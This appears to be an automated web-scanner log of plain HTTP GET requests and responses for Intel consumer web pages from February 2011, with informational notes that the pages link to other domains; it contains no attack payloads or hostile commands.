GET /consumer/game/mobile/index.htm?iid=subhdr+game_mobile HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:01 GMT Content-Length: 31294 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/game/teams/events.htm?iid=subhdr+game_teams HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:05 GMT Content-Length: 19243 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US"> <head> <meta na ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:09 GMT Connection: close Content-Length: 30374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following links to other domains:
http://use.typekit.com/yhr6rfe.js
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/products/?iid=gg_play+products HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following links to other domains:
http://use.typekit.com/yhr6rfe.js
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/products/index.htm?iid=gg_play+products HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following links to other domains:
http://use.typekit.com/yhr6rfe.js
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/products/processors/chipset.htm?iid=en_US_01_chipset+gg_headline HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:56 GMT Content-Length: 30536 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/products/processors/comparison.htm?iid=gg_play+products_processors HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:56 GMT Content-Length: 19808 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US"> <head> <meta na ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following links to other domains:
http://use.typekit.com/yhr6rfe.js
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/products/processors/index.htm?iid=subhdr+products_proc HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38943
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /consumer/products/processors/ratings.htm?iid=gg_play+products_processors_ratings HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44191
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/products/smarttv/index.htm?iid=gg_prod-en_US+smarttv HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:59 GMT Content-Length: 31774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following links to other domains:
http://use.typekit.com/yhr6rfe.js
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/products/technology/index.htm?iid=subhdr+products_tech HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 